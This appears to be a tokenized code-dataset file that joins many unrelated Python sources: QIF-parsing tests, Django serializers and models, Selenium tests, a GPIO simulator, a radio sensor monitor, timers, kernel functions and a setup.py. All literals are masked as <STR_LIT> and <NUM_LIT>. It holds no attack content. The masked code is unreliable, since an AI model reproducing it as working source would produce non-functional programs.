= ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_dash_amount ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn_list = converter . txns_by_date [ "<STR_LIT>" ] <EOL> self . assertEqual ( len ( txn_list ) , <NUM_LIT:1> ) <EOL> txn = txn_list [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_trailing_minus ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_n_a_number ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn . has_key ( "<STR_LIT>" ) , False ) <EOL> def test_creditcard_number ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn . has_key ( "<STR_LIT>" ) , False ) <EOL> def test_creditcard_stmt_number ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn . has_key ( "<STR_LIT>" ) , False ) <EOL> def test_check_stmt_number ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn . get ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def test_usaa_check ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn . get ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> self . assertEqual ( txn . get ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from election_office_measure . models import CandidateCampaign <EOL> from organization . models import Organization <EOL> from position . models import PositionEntered <EOL> from rest_framework import serializers <EOL> class CandidateCampaignSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = CandidateCampaign <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class OrganizationSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = Organization <EOL> fields = ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT:url>' ) <EOL> class PositionSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = PositionEntered <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from django . db import models <EOL> import csv <EOL> from wevotebase . base import get_environment_variable <EOL> import wevote_functions . admin <EOL> LEGISLATORS_CURRENT_CSV_FILE = get_environment_variable ( "<STR_LIT>" ) <EOL> legislators_current_fields = ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:type>" , <EOL> "<STR_LIT:state>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:url>" , <EOL> "<STR_LIT:address>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) <EOL> logger = wevote_functions . admin . get_logger ( __name__ ) <EOL> class TheUnitedStatesIoLegislatorCurrent ( models . Model ) : <EOL> last_name = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT> , default = None , null = True , blank = True ) <EOL> first_name = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT> , default = None , null = True , blank = True ) <EOL> birthday = models . DateField ( "<STR_LIT>" , default = None , null = True , blank = True ) <EOL> gender = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT:10> ) <EOL> type = models . CharField ( "<STR_LIT:type>" , max_length = <NUM_LIT> ) <EOL> state = models . CharField ( "<STR_LIT:state>" , max_length = <NUM_LIT> ) <EOL> district = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> party = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> url = models . CharField ( "<STR_LIT:url>" , max_length = <NUM_LIT> ) <EOL> address = models . CharField ( "<STR_LIT:address>" , max_length = <NUM_LIT> ) <EOL> phone = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> contact_form = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> rss_url = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> twitter = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> facebook = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> facebook_id = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> youtube = models . CharField ( "<STR_LIT>" , max_length = <NUM_LIT> ) <EOL> youtube_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT> , default = None , null = True , blank = True ) <EOL> bioguide_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = True ) <EOL> thomas_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = True ) <EOL> opensecrets_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = False ) <EOL> lis_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = False ) <EOL> cspan_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = False ) <EOL> govtrack_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = True ) <EOL> votesmart_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = False ) <EOL> ballotpedia_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT> , default = None , null = True , blank = True ) <EOL> washington_post_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True ) <EOL> icpsr_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:200> , null = True , unique = False ) <EOL> wikipedia_id = models . CharField ( verbose_name = "<STR_LIT>" , <EOL> max_length = <NUM_LIT> , default = None , null = True , blank = True ) <EOL> was_processed = models . BooleanField ( verbose_name = "<STR_LIT>" , default = False , null = False , blank = False ) <EOL> def delete_all_legislator_data ( ) : <EOL> with open ( LEGISLATORS_CURRENT_CSV_FILE , '<STR_LIT>' ) as legislators_current_data : <EOL> legislators_current_data . readline ( ) <EOL> reader = csv . reader ( legislators_current_data ) <EOL> for index , legislator_row in enumerate ( reader ) : <EOL> if index > <NUM_LIT:3> : <EOL> break <EOL> legislator_entry = TheUnitedStatesIoLegislatorCurrent . objects . order_by ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> legislator_entry . delete ( ) </s>
<s> from django . test import TestCase </s>
<s> from django . test import TestCase </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> from local import * <EOL> except ImportError as e : <EOL> try : <EOL> from production_heroku import * <EOL> except ImportError as e : <EOL> pass </s>
<s> from time import time <EOL> from nose . tools import eq_ , ok_ <EOL> from selenium . webdriver import Firefox <EOL> from tests . simple_page import SimplePage <EOL> class TestCustomDriver ( object ) : <EOL> def setUp ( self ) : <EOL> self . driver = Firefox ( ) <EOL> self . driver . implicitly_wait ( <NUM_LIT:1> ) <EOL> self . page = SimplePage ( self . driver ) <EOL> self . page . open ( ) <EOL> def test_finds ( self ) : <EOL> start = time ( ) <EOL> eq_ ( len ( self . page . empty_element_list ) , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> ok_ ( time ( ) - start < <NUM_LIT:1> , '<STR_LIT>' ) <EOL> def test_nested_finds_in_container ( self ) : <EOL> start = time ( ) <EOL> eq_ ( len ( self . page . physical_container . empty_element_list ) , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> ok_ ( time ( ) - start < <NUM_LIT:1> , '<STR_LIT>' ) <EOL> def test_nested_finds_in_logical_container ( self ) : <EOL> start = time ( ) <EOL> eq_ ( len ( self . page . logical_container . empty_element_list ) , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> ok_ ( time ( ) - start < <NUM_LIT:1> , '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> self . driver . quit ( ) </s>
<s> from selenium . webdriver import Firefox <EOL> from selenium . webdriver . common . by import By <EOL> driver_class = Firefox <EOL> implicit_timeout = <NUM_LIT:30> <EOL> wait_timeout = <NUM_LIT:30> <EOL> default_search_type = By . ID <EOL> try : <EOL> from local_webium_settings import * <EOL> except ImportError : <EOL> pass </s>
<s> import sys <EOL> try : <EOL> import thread <EOL> except ImportError : <EOL> import _thread as thread <EOL> MIN_PIN = <NUM_LIT:0> <EOL> MAX_PIN = <NUM_LIT:16> <EOL> LABELS = "<STR_LIT>" <EOL> IN = <NUM_LIT:0> <EOL> OUT = <NUM_LIT:1> <EOL> BCM = <NUM_LIT:0> <EOL> BOARD = <NUM_LIT:1> <EOL> HIGH = <NUM_LIT:1> <EOL> LOW = <NUM_LIT:0> <EOL> def trace ( msg ) : <EOL> print ( str ( msg ) ) <EOL> def write ( msg ) : <EOL> print ( str ( msg ) ) <EOL> if sys . version_info . major > <NUM_LIT:2> : <EOL> def ask ( msg = "<STR_LIT>" ) : <EOL> return input ( msg ) <EOL> else : <EOL> def ask ( msg = "<STR_LIT>" ) : <EOL> return raw_input ( msg ) <EOL> class GPIOClient : <EOL> pinmode = { } <EOL> pinstate = { } <EOL> def __init__ ( self , server = False ) : <EOL> if server : <EOL> self . controlInputs ( True ) <EOL> def setmode ( self , mode ) : <EOL> pass <EOL> def setup ( self , channel , mode ) : <EOL> self . pinmode [ channel ] = mode <EOL> if mode == IN : <EOL> self . pinstate [ channel ] = HIGH <EOL> elif mode == OUT : <EOL> self . pinstate [ channel ] = LOW <EOL> self . _show ( ) <EOL> def input ( self , channel ) : <EOL> try : <EOL> return self . pinstate [ channel ] <EOL> except KeyError : <EOL> return HIGH <EOL> def output ( self , channel , value ) : <EOL> self . pinstate [ channel ] = self . _pinValue ( value ) <EOL> self . _show ( ) <EOL> def cleanup ( self ) : <EOL> self . pinmode = { } <EOL> self . pinstate = { } <EOL> def _pinValue ( self , v ) : <EOL> if v == None or v == False or v == <NUM_LIT:0> : <EOL> return LOW <EOL> return HIGH <EOL> def _show2 ( self ) : <EOL> write ( "<STR_LIT>" + str ( self . pinmode ) ) <EOL> write ( "<STR_LIT>" + str ( self . pinstate ) ) <EOL> write ( "<STR_LIT>" ) <EOL> def _show ( self ) : <EOL> line = "<STR_LIT>" <EOL> for p in range ( MIN_PIN , MAX_PIN + <NUM_LIT:1> ) : <EOL> line += LABELS [ p ] <EOL> if ( p + <NUM_LIT:1> ) % <NUM_LIT:4> == <NUM_LIT:0> : <EOL> line += "<STR_LIT:U+0020>" <EOL> write ( line ) <EOL> line = "<STR_LIT>" <EOL> for p in range ( MIN_PIN , MAX_PIN + <NUM_LIT:1> ) : <EOL> try : <EOL> if self . pinmode [ p ] == IN : <EOL> line += "<STR_LIT:I>" <EOL> elif self . pinmode [ p ] == OUT : <EOL> line += "<STR_LIT:O>" <EOL> else : <EOL> line += "<STR_LIT:?>" <EOL> except KeyError : <EOL> line += "<STR_LIT:X>" <EOL> if ( p + <NUM_LIT:1> ) % <NUM_LIT:4> == <NUM_LIT:0> : <EOL> line += "<STR_LIT:U+0020>" <EOL> write ( line ) <EOL> line = "<STR_LIT>" <EOL> for p in range ( MIN_PIN , MAX_PIN + <NUM_LIT:1> ) : <EOL> try : <EOL> if self . pinstate [ p ] == <NUM_LIT:1> : <EOL> line += "<STR_LIT:1>" <EOL> elif self . pinstate [ p ] == <NUM_LIT:0> : <EOL> line += "<STR_LIT:0>" <EOL> else : <EOL> trace ( "<STR_LIT>" + str ( p ) + "<STR_LIT>" + str ( self . pinstate [ p ] ) ) <EOL> line += "<STR_LIT:?>" <EOL> except KeyError : <EOL> line += "<STR_LIT:X>" <EOL> if ( p + <NUM_LIT:1> ) % <NUM_LIT:4> == <NUM_LIT:0> : <EOL> line += "<STR_LIT:U+0020>" <EOL> write ( line ) <EOL> write ( "<STR_LIT>" ) <EOL> def changeInput ( self , channel , value ) : <EOL> if self . pinmode [ channel ] != IN : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . pinstate [ channel ] = self . _pinValue ( value ) <EOL> _serverRunning = False <EOL> _kbdThread = None <EOL> def controlInputs ( self , flag ) : <EOL> if flag and not self . _serverRunning : <EOL> self . _startServer ( ) <EOL> elif not flag and self . _serverRunning : <EOL> self . _stopServer ( ) <EOL> def _startServer ( self ) : <EOL> self . _kbdThread = thread . start_new_thread ( self . _server , ( ) ) <EOL> self . _serverRunning = True <EOL> def _stopServer ( self ) : <EOL> self . _kbdThread . stop ( ) <EOL> self . _kbdThread = None <EOL> self . _serverRunning = False <EOL> def _parse_pinch ( self , ch ) : <EOL> return LABELS . index ( ch ) <EOL> def _getcmd ( self ) : <EOL> while True : <EOL> cmdstr = ask ( ) <EOL> cmdstr = cmdstr . strip ( ) <EOL> if len ( cmdstr ) >= <NUM_LIT:2> : <EOL> return cmdstr <EOL> def _parsecmd ( self , cmdstr ) : <EOL> pinch = cmdstr [ <NUM_LIT:0> ] <EOL> valuech = cmdstr [ <NUM_LIT:1> ] <EOL> channel = self . _parse_pinch ( pinch ) <EOL> return channel , valuech <EOL> def _process ( self , channel , valuech ) : <EOL> if valuech == "<STR_LIT:I>" : <EOL> self . setmode ( channel , IN ) <EOL> elif valuech == "<STR_LIT:O>" : <EOL> self . setmode ( channel , OUT ) <EOL> elif valuech == "<STR_LIT:1>" : <EOL> self . changeInput ( channel , True ) <EOL> elif valuech == "<STR_LIT:0>" : <EOL> self . changeInput ( channel , False ) <EOL> def _server ( self ) : <EOL> while True : <EOL> cmdstr = self . _getcmd ( ) <EOL> channel , valuech = self . _parsecmd ( cmdstr ) <EOL> self . _process ( channel , valuech ) </s>
<s> import time <EOL> from energenie import OpenThings <EOL> from energenie import Devices , Messages , radio <EOL> import os <EOL> LOG_FILENAME = "<STR_LIT>" <EOL> def warning ( msg ) : <EOL> print ( "<STR_LIT>" % str ( msg ) ) <EOL> def trace ( msg ) : <EOL> print ( "<STR_LIT>" % str ( msg ) ) <EOL> log_file = None <EOL> def logMessage ( msg ) : <EOL> HEADINGS = '<STR_LIT>' <EOL> global log_file <EOL> if log_file == None : <EOL> if not os . path . isfile ( LOG_FILENAME ) : <EOL> log_file = open ( LOG_FILENAME , '<STR_LIT:w>' ) <EOL> log_file . write ( HEADINGS + '<STR_LIT:\n>' ) <EOL> else : <EOL> log_file = open ( LOG_FILENAME , '<STR_LIT:a>' ) <EOL> header = msg [ '<STR_LIT>' ] <EOL> timestamp = time . time ( ) <EOL> mfrid = header [ '<STR_LIT>' ] <EOL> productid = header [ '<STR_LIT>' ] <EOL> sensorid = header [ '<STR_LIT>' ] <EOL> flags = [ <NUM_LIT:0> for i in range ( <NUM_LIT:7> ) ] <EOL> switch = None <EOL> voltage = None <EOL> freq = None <EOL> reactive = None <EOL> real = None <EOL> apparent = None <EOL> current = None <EOL> for rec in msg [ '<STR_LIT>' ] : <EOL> paramid = rec [ '<STR_LIT>' ] <EOL> try : <EOL> value = rec [ '<STR_LIT:value>' ] <EOL> except : <EOL> value = None <EOL> if paramid == OpenThings . PARAM_SWITCH_STATE : <EOL> switch = value <EOL> flags [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> elif paramid == OpenThings . PARAM_VOLTAGE : <EOL> flags [ <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> voltage = value <EOL> elif paramid == OpenThings . PARAM_FREQUENCY : <EOL> flags [ <NUM_LIT:2> ] = <NUM_LIT:1> <EOL> freq = value <EOL> elif paramid == OpenThings . PARAM_REACTIVE_POWER : <EOL> flags [ <NUM_LIT:3> ] = <NUM_LIT:1> <EOL> reactive = value <EOL> elif paramid == OpenThings . PARAM_REAL_POWER : <EOL> flags [ <NUM_LIT:4> ] = <NUM_LIT:1> <EOL> real = value <EOL> elif paramid == OpenThings . PARAM_APPARENT_POWER : <EOL> flags [ <NUM_LIT:5> ] = <NUM_LIT:1> <EOL> apparent = value <EOL> elif paramid == OpenThings . PARAM_CURRENT : <EOL> flags [ <NUM_LIT:6> ] = <NUM_LIT:1> <EOL> current = value <EOL> flags = "<STR_LIT>" . join ( [ str ( a ) for a in flags ] ) <EOL> csv = "<STR_LIT>" % ( timestamp , mfrid , productid , sensorid , flags , switch , voltage , freq , reactive , real , apparent , current ) <EOL> log_file . write ( csv + '<STR_LIT:\n>' ) <EOL> log_file . flush ( ) <EOL> trace ( csv ) <EOL> directory = { } <EOL> def allkeys ( d ) : <EOL> result = "<STR_LIT>" <EOL> for k in d : <EOL> if len ( result ) != <NUM_LIT:0> : <EOL> result += '<STR_LIT:U+002C>' <EOL> result += str ( k ) <EOL> return result <EOL> def updateDirectory ( message ) : <EOL> """<STR_LIT>""" <EOL> now = time . time ( ) <EOL> header = message [ "<STR_LIT>" ] <EOL> sensorId = header [ "<STR_LIT>" ] <EOL> if not directory . has_key ( sensorId ) : <EOL> desc = Devices . getDescription ( header [ "<STR_LIT>" ] , header [ "<STR_LIT>" ] ) <EOL> print ( "<STR_LIT>" % ( hex ( sensorId ) , desc ) ) <EOL> directory [ sensorId ] = { "<STR_LIT>" : message [ "<STR_LIT>" ] } <EOL> directory [ sensorId ] [ "<STR_LIT:time>" ] = now <EOL> def send_join_ack ( mfrid , productid , sensorid ) : <EOL> response = OpenThings . alterMessage ( Messages . JOIN_ACK , <EOL> header_mfrid = mfrid , <EOL> header_productid = productid , <EOL> header_sensorid = sensorid ) <EOL> p = OpenThings . encode ( response ) <EOL> radio . transmitter ( ) <EOL> radio . transmit ( p ) <EOL> radio . receiver ( ) <EOL> def monitor_loop ( ) : <EOL> """<STR_LIT>""" <EOL> radio . receiver ( ) <EOL> while True : <EOL> if radio . isReceiveWaiting ( ) : <EOL> payload = radio . receive ( ) <EOL> try : <EOL> decoded = OpenThings . decode ( payload ) <EOL> except OpenThings . OpenThingsException as e : <EOL> warning ( "<STR_LIT>" + str ( e ) ) <EOL> continue <EOL> OpenThings . showMessage ( decoded ) <EOL> updateDirectory ( decoded ) <EOL> logMessage ( decoded ) <EOL> if len ( decoded [ "<STR_LIT>" ] ) == <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" % decoded ) <EOL> else : <EOL> if decoded [ "<STR_LIT>" ] [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == OpenThings . PARAM_JOIN : <EOL> header = decoded [ "<STR_LIT>" ] <EOL> mfrid = header [ "<STR_LIT>" ] <EOL> productid = header [ "<STR_LIT>" ] <EOL> sensorid = header [ "<STR_LIT>" ] <EOL> send_join_ack ( mfrid , productid , sensorid ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> trace ( "<STR_LIT>" ) <EOL> radio . init ( ) <EOL> OpenThings . init ( Devices . CRYPT_PID ) <EOL> try : <EOL> monitor_loop ( ) <EOL> finally : <EOL> radio . finished ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import sys <EOL> import time <EOL> from . . utils import lazy_import , Runnable <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Timer ( Runnable ) : <EOL> """<STR_LIT>""" <EOL> clock = time . clock <EOL> def __call__ ( self ) : <EOL> return self . clock ( ) <EOL> def run ( self , profiler ) : <EOL> yield <EOL> class ContextualTimer ( Timer ) : <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> timer = super ( ContextualTimer , cls ) . __new__ ( cls , * args , ** kwargs ) <EOL> timer . _contextual_times = { } <EOL> return timer <EOL> def __call__ ( self , context = None ) : <EOL> if context is None : <EOL> context = self . detect_context ( ) <EOL> paused_at , resumed_at = self . _contextual_times . get ( context , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> if resumed_at is None : <EOL> return paused_at <EOL> return paused_at + self . clock ( ) - resumed_at <EOL> def pause ( self , context = None ) : <EOL> if context is None : <EOL> context = self . detect_context ( ) <EOL> self . _contextual_times [ context ] = ( self ( context ) , None ) <EOL> def resume ( self , context = None ) : <EOL> if context is None : <EOL> context = self . detect_context ( ) <EOL> paused_at , __ = self . _contextual_times . get ( context , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> self . _contextual_times [ context ] = ( paused_at , self . clock ( ) ) <EOL> def detect_context ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class ThreadTimer ( Timer ) : <EOL> """<STR_LIT>""" <EOL> if sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:3> ) : <EOL> yappi = lazy_import ( '<STR_LIT>' ) <EOL> def __call__ ( self ) : <EOL> return self . yappi . get_clock_time ( ) <EOL> else : <EOL> def __call__ ( self ) : <EOL> return time . clock_gettime ( time . CLOCK_THREAD_CPUTIME_ID ) <EOL> class GreenletTimer ( ContextualTimer ) : <EOL> """<STR_LIT>""" <EOL> greenlet = lazy_import ( '<STR_LIT>' ) <EOL> def detect_context ( self ) : <EOL> if self . greenlet : <EOL> return id ( self . greenlet . getcurrent ( ) ) <EOL> def _trace ( self , event , args ) : <EOL> origin , target = args <EOL> self . pause ( id ( origin ) ) <EOL> self . resume ( id ( target ) ) <EOL> def run ( self , profiler ) : <EOL> self . greenlet . settrace ( self . _trace ) <EOL> yield <EOL> self . greenlet . settrace ( None ) </s>
<s> '''<STR_LIT>''' <EOL> import numpy as np <EOL> class Linear ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' <EOL> def calc ( self , v1 , v2 ) : <EOL> if v2 == None : v2 = v1 <EOL> return np . dot ( v1 . T , v2 ) <EOL> class Polynomial ( object ) : <EOL> '''<STR_LIT>''' <EOL> __degree = <NUM_LIT:0> <EOL> def __init__ ( self , deg = <NUM_LIT:2> ) : <EOL> self . __degree = deg <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' . format ( degree = self . __degree ) <EOL> def calc ( self , v1 , v2 = None ) : <EOL> if v2 == None : v2 = v1 <EOL> return np . power ( np . dot ( v1 . T , v2 ) , self . __degree ) <EOL> class RBF ( object ) : <EOL> '''<STR_LIT>''' <EOL> __gamma = <NUM_LIT:0> <EOL> def __init__ ( self , gamma = <NUM_LIT:1> ) : <EOL> self . __gamma = gamma <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' . format ( gamma = self . __gamma ) <EOL> def calc ( self , v1 , v2 = None ) : <EOL> if v2 == None : v2 = v1 <EOL> l2 = np . linalg . norm ( v1 - v2 ) <EOL> return np . exp ( - self . __gamma * l2 ** <NUM_LIT:2> ) </s>
<s> import urllib2 <EOL> import ujson <EOL> from catsup . logger import logger <EOL> def search_github ( name ) : <EOL> repo_name = "<STR_LIT>" . format ( name = name ) <EOL> url = "<STR_LIT>" + repo_name <EOL> request = urllib2 . Request ( url ) <EOL> request . add_header ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> try : <EOL> response = urllib2 . urlopen ( request ) <EOL> except urllib2 . HTTPError as e : <EOL> logger . warning ( "<STR_LIT>" . format ( e . msg ) ) <EOL> return None <EOL> content = response . read ( ) <EOL> json = ujson . loads ( content ) <EOL> if json [ "<STR_LIT>" ] == <NUM_LIT:0> : <EOL> return None <EOL> for item in json [ "<STR_LIT>" ] : <EOL> if item [ "<STR_LIT:name>" ] == repo_name : <EOL> return { <EOL> "<STR_LIT:name>" : item [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT>" : item [ "<STR_LIT>" ] <EOL> } </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import xmltodict <EOL> from werobot . messages import MESSAGE_TYPES , UnknownMessage <EOL> def parse_user_msg ( xml ) : <EOL> return process_message ( parse_xml ( xml ) ) <EOL> def parse_xml ( text ) : <EOL> xml_dict = xmltodict . parse ( text ) [ "<STR_LIT>" ] <EOL> xml_dict [ "<STR_LIT>" ] = text <EOL> return xml_dict <EOL> def process_message ( message ) : <EOL> """<STR_LIT>""" <EOL> message [ "<STR_LIT:type>" ] = message . pop ( "<STR_LIT>" ) . lower ( ) <EOL> message_type = MESSAGE_TYPES . get ( message [ "<STR_LIT:type>" ] , UnknownMessage ) <EOL> return message_type ( message ) </s>
<s> from setuptools import setup , find_packages <EOL> from setuptools . command . test import test as TestCommand <EOL> import sys <EOL> version = '<STR_LIT>' <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> tests_require = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> class PyTest ( TestCommand ) : <EOL> def finalize_options ( self ) : <EOL> TestCommand . finalize_options ( self ) <EOL> self . test_args = [ '<STR_LIT>' ] <EOL> self . test_suite = True <EOL> def run_tests ( self ) : <EOL> import pytest <EOL> errno = pytest . main ( self . test_args ) <EOL> sys . exit ( errno ) <EOL> setup ( name = '<STR_LIT>' , <EOL> version = version , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) + '<STR_LIT:\n>' + <EOL> open ( '<STR_LIT>' ) . read ( ) , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> keywords = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( '<STR_LIT:src>' ) , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT:src>' } , <EOL> include_package_data = True , <EOL> zip_safe = True , <EOL> install_requires = install_requires , <EOL> tests_require = tests_require , <EOL> extras_require = { '<STR_LIT>' : tests_require } , <EOL> cmdclass = { '<STR_LIT:test>' : PyTest } , <EOL> ) </s>
<s> from functools import wraps <EOL> from . context import Context <EOL> from . process import Process <EOL> _ROOT_CONTEXT = None <EOL> def initialize ( delegate = "<STR_LIT>" , ** kw ) : <EOL> global _ROOT_CONTEXT <EOL> _ROOT_CONTEXT = Context . singleton ( delegate = delegate , ** kw ) <EOL> if not _ROOT_CONTEXT . is_alive ( ) : <EOL> _ROOT_CONTEXT . start ( ) <EOL> def join ( ) : <EOL> """<STR_LIT>""" <EOL> _ROOT_CONTEXT . join ( ) <EOL> def after_init ( fn ) : <EOL> @ wraps ( fn ) <EOL> def wrapper_fn ( * args , ** kw ) : <EOL> initialize ( ) <EOL> return fn ( * args , ** kw ) <EOL> return wrapper_fn <EOL> @ after_init <EOL> def spawn ( process ) : <EOL> """<STR_LIT>""" <EOL> return _ROOT_CONTEXT . spawn ( process ) <EOL> route = Process . route <EOL> install = Process . install <EOL> __all__ = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> del after_init </s>
